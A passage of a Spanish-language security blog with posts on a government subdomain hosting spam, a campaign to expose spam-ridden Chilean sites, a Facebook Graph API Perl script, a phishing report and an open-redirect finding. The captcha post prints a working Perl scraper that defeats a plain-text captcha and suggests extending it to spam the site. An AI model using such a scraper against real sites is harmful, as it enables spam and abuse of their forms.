<span style="font-family: "courier new" , "courier" , monospace;">A todo esto por el paro, <b>ayer sábado 21 de noviembre</b> el registro civil abrió sus puertas, y era el <a href="http://www.24horas.cl/nacional/este-sabado-sera-el-ultimo-dia-para-sacar-el-pasaporte-antes-del-alza-1852018" target="_blank">último día para obtener el pasaporte antes del alza de precio</a> - <strike>canallas qls c: </strike>- así que era hora de levantarse después de una buena celebración el día anterior, y piscolas por todos lados, pero esa ya es otra historia.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">- Esperando mi turno para obtener pasaporte fue que me puse a mirar que <b>en cada cubículo de atención</b> ( alrededor de 7 ) tenían una pantalla que daba hacia el público donde se iba <b>mostrando la información de la persona que estaba siendo atendida</b>, a medida que avanzaba en el proceso de obtención de cédula o pasaporte.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-MpD3ZxFFRxoWDB1Nh24u3vFSOJQlQ7uMQ9wMgzNllCksBxX44EQ0uSL_CBN5XBQb8AxRJ8GQVeX0Go3sBTPlCSgVEswEk0eCkKgpe4dy75OE8TyZ1E5D1Dww-zCOj6ppQvOko-_gsam1/s1600/IMG_5209.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-MpD3ZxFFRxoWDB1Nh24u3vFSOJQlQ7uMQ9wMgzNllCksBxX44EQ0uSL_CBN5XBQb8AxRJ8GQVeX0Go3sBTPlCSgVEswEk0eCkKgpe4dy75OE8TyZ1E5D1Dww-zCOj6ppQvOko-_gsam1/s320/IMG_5209.JPG" width="235"></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"></span></div>
<a href="http://xshinee.blogspot.com/2015/11/privacidad-hoy-en-dia-registro-civil.html#more">Seguir Leyendo >></a>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-19583884731189860402015-05-08T07:57:00.001-07:002016-02-04T07:39:58.393-08:00Sitio del Mineduc vulnerado?, let's see!<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnK1oKaW6V1kNBoQNiAw-wE281MadMH92bFgAR1UWvK9HHk7cBOUeIE7dba_Ta2-_46EFTSpYuu5ayt4AEXzx90TQGTiX0Pp1LvrOd3iSIjGKH5ek4po5Xq4zrhT6yU7jbLfi8h8OI6uRH/s1600/logoMineduc.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnK1oKaW6V1kNBoQNiAw-wE281MadMH92bFgAR1UWvK9HHk7cBOUeIE7dba_Ta2-_46EFTSpYuu5ayt4AEXzx90TQGTiX0Pp1LvrOd3iSIjGKH5ek4po5Xq4zrhT6yU7jbLfi8h8OI6uRH/s200/logoMineduc.jpg" width="188"></a></div>
<br>
<span style="font-family: "courier new" , "courier" , monospace;">No es nuevo encontrar que sitios del gobierno han sido vulnerados de alguna u otra forma, hemos visto: deface, enlaces a pornografia ocultos <strike>[Sí, la JUNJI]</strike></span> <span style="font-family: "courier new" , "courier" , monospace;">, robo de información?, incluso ataques automatizados que toman ventaja de vulnerabilidades conocidas en Webapps.</span><br>
<br>
<span style="font-family: "courier new" , "courier" , monospace;">Hoy es el turno de un subdominio del Mineduc, me refiero a: http://sgdce.mineduc.cl/ </span><br>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<span style="font-family: "courier new" , "courier" , monospace;">Haciendo una búsqueda en Google con un pequeño DORK nos damos cuenta que mantiene contenido con variadas rutas finales que ninguna relación tienen con el contenido que esperariamos encontrar en una pagina del Gobierno.</span><br>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<span style="font-family: "courier new" , "courier" , monospace;">Aquí solo Algunos: =x</span><br>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<br>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglchnVJVqB6KfyEqqVX2Tk9l2n2MuzMuM_ddBpERRGH4hUlRW2RIW-BLMG7FNIrDCmAzuHPeSwAw5A8AYGRz0SgxkVdw6hgA1HFF27unnqUJGJ2f2F79-4IEr7dyuPifXPd_dg7Pj8HPHY/s1600/links.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="355" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglchnVJVqB6KfyEqqVX2Tk9l2n2MuzMuM_ddBpERRGH4hUlRW2RIW-BLMG7FNIrDCmAzuHPeSwAw5A8AYGRz0SgxkVdw6hgA1HFF27unnqUJGJ2f2F79-4IEr7dyuPifXPd_dg7Pj8HPHY/s640/links.png" width="640"></a></div>
<span style="font-family: "courier new" , "courier" , monospace;"><br></span>
<span style="font-family: "courier new" , "courier" , monospace;"></span><br>
<a href="http://xshinee.blogspot.com/2015/05/sitio-del-mineduc-vulnerado-lets-see.html#more">Seguir Leyendo >></a>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com1tag:blogger.com,1999:blog-7067370504470948159.post-83478089316625312282015-04-14T16:31:00.002-07:002015-04-14T18:46:46.270-07:00#BotCommentsCL : Es momento de ser responsable de nuestros sitios<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrWHZACA3o-HN5FZlmU6JKwxV7_ks_vCr7eVkGWHCIzgR8K-JnrBKQDHBa8_4LmZwLKTDsCyrDCsSRVocsjuxcEiYPEqVIfI84sa4fqteyYJEoYP57TTzT8JtV_um3RMi1fFrioOQQI3xk/s1600/Notas...+que+son+Bots+solonuevas.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrWHZACA3o-HN5FZlmU6JKwxV7_ks_vCr7eVkGWHCIzgR8K-JnrBKQDHBa8_4LmZwLKTDsCyrDCsSRVocsjuxcEiYPEqVIfI84sa4fqteyYJEoYP57TTzT8JtV_um3RMi1fFrioOQQI3xk/s1600/Notas...+que+son+Bots+solonuevas.png" height="200" width="198" /></a></div>
<br />
<span style="font-family: Courier New, Courier, monospace;"><b>#BotCommentsCL </b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">BotCommentsCL es una iniciativa con la cual se busca dejar en evidencia a sitios chilenos que <b>no se hacen cargo de lo que se comenta en sus webs</b>, muchas veces por Bots entrenados para propagar publicaciones con contenido Sexual | Drogas u otro tipo de contenido no apropiado.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Es común navegar por Internet, en este caso en sitios chilenos, y encontrarnos con algunos foros abandonados o páginas que permiten comentarios, en donde no utilizan captcha o algún otro sistema para evitar robots , o simplemente son deficientes. Son estos tipos de sitios los que almacenan miles de publicaciones con links a todo tipo de contenido inapropiado, muchas veces incluso promocionando sitios de Pornografía Infantil, Venta y uso de Drogas .</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Por otro lado, existe otra forma de ataque donde explotan vulnerabilidades en los CMS o Servidores para así dejar contenido en los sitios de la forma http://web.cl/ContenidoInapropiado/ , donde es común ver que la página nos redirecciona a otros sitios, o nos incentiva a descargar algún tipo de ejecutable u ofrece contenido pornográfico muchas veces ILEGAL.</span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><b>#BotCommentsCL</b> busca exponer estos sitios haciendo uso del mismo hash en Twitter acompañado del link al sitio para dejarlo en evidencia.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<h3>
<span style="font-family: Courier New, Courier, monospace;">¿De que hablo? </span></h3>
<span style="font-family: Courier New, Courier, monospace;">Colegios:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAN5aeHkfS5g7QEytq3yDM_DUyTPxgcyxfyDgfq43bjc2tgUdb4zlX8lTxeQSjG3k5M8TCIkcmKxidjtSCi_uGAyoa81sBiImCot7YHJZOmXa3BMUCL7si-RkszF5iOjQa641rD9JbMwbh/s1600/non1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAN5aeHkfS5g7QEytq3yDM_DUyTPxgcyxfyDgfq43bjc2tgUdb4zlX8lTxeQSjG3k5M8TCIkcmKxidjtSCi_uGAyoa81sBiImCot7YHJZOmXa3BMUCL7si-RkszF5iOjQa641rD9JbMwbh/s1600/non1.png" height="163" width="400" /></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Obispado:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmAnzDLDoB03uWEUZoFFr8WYya4caSJ1s-7m4UauTC05cf81E1QHSj4tpjtJy5QdQAb6W8CkkJ8Y49YzfOHRvS0jGizpHDHNRx-tNTxNWrwaK0EW6qlV6Mo3D6iF18FWS_7YCPqHOgnUfm/s1600/boot1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmAnzDLDoB03uWEUZoFFr8WYya4caSJ1s-7m4UauTC05cf81E1QHSj4tpjtJy5QdQAb6W8CkkJ8Y49YzfOHRvS0jGizpHDHNRx-tNTxNWrwaK0EW6qlV6Mo3D6iF18FWS_7YCPqHOgnUfm/s1600/boot1.png" height="72" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace;">Universidades:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP4lFjw-i9YbtFv-AZjmtr_5NeqM8zRM_KoWMos_3jpvDGYMP69NUjfWC4Oa72pOdVuT0va3wIlZk2e4iwnwYzuuMSljkCHsnDmHh-zdpA4Ob0jJS-nqa50GzeVYu_FeXt4Mg0X5G99Mvj/s1600/boot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP4lFjw-i9YbtFv-AZjmtr_5NeqM8zRM_KoWMos_3jpvDGYMP69NUjfWC4Oa72pOdVuT0va3wIlZk2e4iwnwYzuuMSljkCHsnDmHh-zdpA4Ob0jJS-nqa50GzeVYu_FeXt4Mg0X5G99Mvj/s1600/boot2.png" height="131" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace;">Municipalidades:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDpRRsT8M0872NKjjgUxpQqCqqsi4ASytw7kcBXAsK0C2PYyT0zoGQPDfVl7wvffxHa7mJkG2Ao1b5NwpNalaz46eZngTYc1yHZYl3cArvR1motOUNRIrXctUoguhyphenhyphennbV-RB-CieQHBm5z/s1600/boot3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDpRRsT8M0872NKjjgUxpQqCqqsi4ASytw7kcBXAsK0C2PYyT0zoGQPDfVl7wvffxHa7mJkG2Ao1b5NwpNalaz46eZngTYc1yHZYl3cArvR1motOUNRIrXctUoguhyphenhyphennbV-RB-CieQHBm5z/s1600/boot3.png" height="75" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<h2 style="text-align: center;">
<span style="font-family: Courier New, Courier, monospace;">Como Publicar en Twitter:</span></h2>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: large;"><b>#BotCommentsCL NOMBRE DE LA INSTITUCIÓN [Cuenta de Twitter si tiene]: Link al sitio con el contenido </b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /><br /><b>Sigue el Hash en Twitter: #BotCommentsCL</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">----------------------------------------------------------------</span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Por una red responsable y más segura !<br /><br />Finish|</span>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-29039714929995167272015-03-07T08:42:00.000-08:002015-03-07T09:36:46.808-08:00Ferl: Facebook con Perl<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEuOzq1-nZsi6XL-ykxCJOuGMMDV3WiurksIQb8x9QfZ9vXbEGiZ4SrQcDcCN0n9GrpHzHp7zaWJ9LfBjBdKfWmGd-n-OONLJO71dF8kgNX_wkMkYNZ9rGBG4RxnRsITV6lqdTzh_LsyIS/s1600/ferl.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEuOzq1-nZsi6XL-ykxCJOuGMMDV3WiurksIQb8x9QfZ9vXbEGiZ4SrQcDcCN0n9GrpHzHp7zaWJ9LfBjBdKfWmGd-n-OONLJO71dF8kgNX_wkMkYNZ9rGBG4RxnRsITV6lqdTzh_LsyIS/s1600/ferl.jpg" height="200" width="320" /></a></div>
<br />
<h3>
<span style="font-family: Courier New, Courier, monospace;">Ferl, Facebook con perl :D</span></h3>
<div>
<span style="font-family: Courier New, Courier, monospace;"><i>He nombrado este miniproyecto "Ferl" Facebook con perl , iré actualizando el código agregando nuevas características apenas vaya teniendo un poquito de tiempo.</i></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Es claro que día a día buscamos como automatizar o hacer mas fácil ciertas tareas que hacemos, o mas simple aun ¿porque no actualizar nuestro estado de Facebook desde nuestra linea de comandos?</span><br />
<span style="font-family: Courier New, Courier, monospace;">¿Porque hacerlo? , porque podemos :D .</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Esta demás decir que estas herramientas nos sirven para marketing online, pasar avisos o incluso ganar concursos =x (darkside) pero hoy solo veremos como mediante perl podemos actualizar nuestro estado mediante la <a href="https://developers.facebook.com/docs/graph-api/" target="_blank">graphAPI</a> de Facebook ! </span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">¿Que módulos vamos a utilizar? ( <strike>hay quienes le gusta complicar todo, pero ¿porque no hacerlo simple </strike>)</span><br />
<br />
<br />
<ul>
<li><span style="font-family: Courier New, Courier, monospace;">URI</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">LWP::Simple</span></li>
</ul>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Vamos a ver que todo se basa en enviar peticiones a : https://graph.facebook.com y en la documentación veremos los parámetros disponibles y como se conforma la estructura de la peticion.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Como lo que nos interesa publicar, veremos que esto se hace de la siguiente manera:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Vamos a generar un POST para me/feed, con la variable "message" con el contenido que queremos que salga en nuestro muro, en otras palabras y mas simple hemos realizado la siguiente peticion:</span></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<pre class="brush: perl; wrap-lines:false">POST graph.facebook.com
/me/feed?
message="Hello, World."&
access_token={your-access-token}
</pre>
<br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Lo que finalmente se vera reflejado en nuestro muro, ya explicado esto vamos al codigo ! #perl</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<pre class="brush: perl; wrap-lines:false">#!/usr/bin/perl
#Ferl, Facebook con Perl
#ShineeLabs
#contacto@xshinee.cl
use strict;
use URI;
use LWP::Simple;
my $access_token = 'Aqui va el token';
my $message = <STDIN>;
chop($mensaje);
conecta ('me/feed', {
access_token => $access_token,
message => $mensaje,
method => 'post'
});
exit 0 ;
sub conecta {
my $urlbase = new URI ('https://graph.facebook.com' . shift );
$urlbase -> query_form(shift);
my $respuesta = get("$urlbase");
}</pre>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br />Como pueden ver en este ejemplo utilizamos la entrada estándar, pero basta un poquito de conocimiento en #perl para poder enviar mensajes de forma automatizada, o usar una lista de mensajes haciendo uso de el manejo de ficheros en perl, o abusar de algunos while & sleep para hacer que el mensaje se envié de forma automática y sincronizada.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">¿Qué otros parámetros podemos utilizar? , <a href="https://developers.facebook.com/docs/graph-api/reference/" target="_blank">revisen la Documentación de la grapAPI .</a></span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><br />FIN </span><br />
<span style="font-family: Courier New, Courier, monospace;">exit;</span>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-81991881793407388782015-01-24T10:47:00.003-08:002015-01-24T10:50:58.081-08:00Verificación Anti-Spam ? - Hell no !<span style="font-family: Courier New, Courier, monospace;">Revisaba unas páginas locales, mas específicamente una revista y me llamo la atención esta "suerte" de captcha. [ Imagen ]</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-6QeTikLJeXudabAPRMQdXmsOhelr1gUchiJqZGA-mROks2pkKgdVtl_bo34-aKdTHelOJCKa5qeMClvDBFfz2E1D5Z1YhH6XSjM-dzE1Cpw3wOcQ-c4bZq8CNTXdNLj-HLUBNXRk2VWB/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-6QeTikLJeXudabAPRMQdXmsOhelr1gUchiJqZGA-mROks2pkKgdVtl_bo34-aKdTHelOJCKa5qeMClvDBFfz2E1D5Z1YhH6XSjM-dzE1Cpw3wOcQ-c4bZq8CNTXdNLj-HLUBNXRk2VWB/s1600/1.png" height="145" width="400" /></a></div>
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span>
<span style="font-family: 'Courier New', Courier, monospace;">Vemos que el patrón del captacha no debiera ser muy difícil de sortear con un poco de captcha recognition o OpenCV pero veamos el source:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">UPS!:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBlVdCX7dnHPjoc5Ahf-Z3JYG-9aC3ga-0lgh9VQKsdctZA5GdYv6Gg57JKUcKMz5qlBwYFg77rHZR92O6qCKrU8KUrVq9bfbv78jzkqcLwMc9F4RaC656llvqLMNFdc1D4ZsU_Eend4Yv/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBlVdCX7dnHPjoc5Ahf-Z3JYG-9aC3ga-0lgh9VQKsdctZA5GdYv6Gg57JKUcKMz5qlBwYFg77rHZR92O6qCKrU8KUrVq9bfbv78jzkqcLwMc9F4RaC656llvqLMNFdc1D4ZsU_Eend4Yv/s1600/2.png" height="28" width="640" /></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">El Captcha esta en texto plano en el source.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Entonces podemos automatizar y SPAMEAR al objetivo sin problema no?</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Para obtener el captcha:[ Perl ]</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<pre class="brush: perl">#!/usr/bin/perl
#blog.xshinee.cl
#@shinee_
use LWP::UserAgent;
use strict;
print "## Explointing...\n";
my $baseUrl="http://URLDESTINO";
my $dato = &httpGet($baseUrl);
while ( $dato =~ m!<span class="validador">(.*?)</span>!ig){
my $rg = $1;
my @data = split(/\+/, $rg);
my $FinalCaptcha = @data[1]+@data[2]+@data[3] ;
print " Este es el captcha $FinalCaptcha\n" ;
};
sub httpGet{
my $url = shift;
my $navegador = new LWP::UserAgent;
$navegador -> agent ("Internet of Things? - Labs");
my $req = HTTP::Request -> new (GET => $url);
my $respuesta = $navegador -> request ($req);
my $contenido = $respuesta ->as_string;
return $contenido;
}
</pre>
___<br />
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Solo queda agregar un par de lineas en el código para que haga el la petición POST y mande el comentario cada cierto tiempo que queramos.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">:)</span></div>
shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-60646956544112764872014-12-27T08:17:00.000-08:002014-12-27T08:20:54.330-08:00Campaña de Phishing - Banco Estado<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivV4I_d7MTNPWIeFOOzDBraZT93lDXClyhJjNRFAstb6_9dB-QNFMQNHnD5wYPDVjBBR0MC-Yh0u8h36xiG9hmLx9ubGecofOPOVUIqVNeTMQwUb7mk2otm-0ms4gkpx0vElr7K0PPCH9s/s1600/bancoestado_cl.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivV4I_d7MTNPWIeFOOzDBraZT93lDXClyhJjNRFAstb6_9dB-QNFMQNHnD5wYPDVjBBR0MC-Yh0u8h36xiG9hmLx9ubGecofOPOVUIqVNeTMQwUb7mk2otm-0ms4gkpx0vElr7K0PPCH9s/s1600/bancoestado_cl.gif"></a></div>
<br>
<br>
<span style="font-family: Courier New, Courier, monospace;">Revisaba mi correo cuando me llamó la atención en mi bandeja de entrada lo siguiente:</span><br>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<br>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjUQnBbG2_7y7aK9_gGqX99zGH1-CC_MqQF16DiLGNTze0MFvgfLewR7u5yZtLKV3bn4ClKEe8R5i4uwOQVk4SxYCM7xnSjvT8LFDj-O3sEcBB5S7QCD1R-YKOQnIJyhEAUUqVxlZkmm9L/s1600/desa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjUQnBbG2_7y7aK9_gGqX99zGH1-CC_MqQF16DiLGNTze0MFvgfLewR7u5yZtLKV3bn4ClKEe8R5i4uwOQVk4SxYCM7xnSjvT8LFDj-O3sEcBB5S7QCD1R-YKOQnIJyhEAUUqVxlZkmm9L/s1600/desa.png" height="36" width="640"></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;">Al entrar al correo nos encontramos con el siguiente contenido, y ya podemos comenzar a sospechar:</span><br>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<br>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIlcZt5yzOCIgoy2FeQjrNyGMcG-PTh-T7E0TdJ-KN9hoqREd6aTiTZxxI3AM4Lg2shTtZmqFPoWA2xB8tR_9APJ1OCM4IxqShgt_sGHFbp4wmHAjSZvxylQMgZrQSRxsWJ-8ubrXNqHV6/s1600/reee.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIlcZt5yzOCIgoy2FeQjrNyGMcG-PTh-T7E0TdJ-KN9hoqREd6aTiTZxxI3AM4Lg2shTtZmqFPoWA2xB8tR_9APJ1OCM4IxqShgt_sGHFbp4wmHAjSZvxylQMgZrQSRxsWJ-8ubrXNqHV6/s1600/reee.png" height="400" width="382"></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<br>
<a href="http://xshinee.blogspot.com/2014/12/caso-de-phishing-banco-estado.html#more">Seguir Leyendo >></a>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-25415235927186601132014-11-22T07:34:00.001-08:002014-11-22T07:34:30.385-08:00LAN.COM | DataLeak & OpenUrlRedirection<span style="font-family: Courier New, Courier, monospace;">Revisando en mi bandeja de correo, LAN.COM genera correo con ofertas-Estados de Cuenta y otras promociones al correo que tenemos registrado con nuestra cuenta. El contenido de estos correos están en un subdominio de lan.com llamado: <b>news.lan.com</b></span><br />
<div>
<b><span style="font-family: Courier New, Courier, monospace;"><br /></span></b></div>
<div>
<b><span style="font-family: Courier New, Courier, monospace;"><br /></span></b></div>
<div>
<b><span style="font-family: Courier New, Courier, monospace;"><br /></span></b></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Al observar mi propio correo enviado por LAN puedo identificar lo siguiente:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">1) Cuando me ofrece acceder a distintos lugares donde debo ser redirigido la URL va de la siguiente forma [imagen 1] y el sitio donde quiero ser enviado pasa como parámetro después de <b>'&'</b>.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
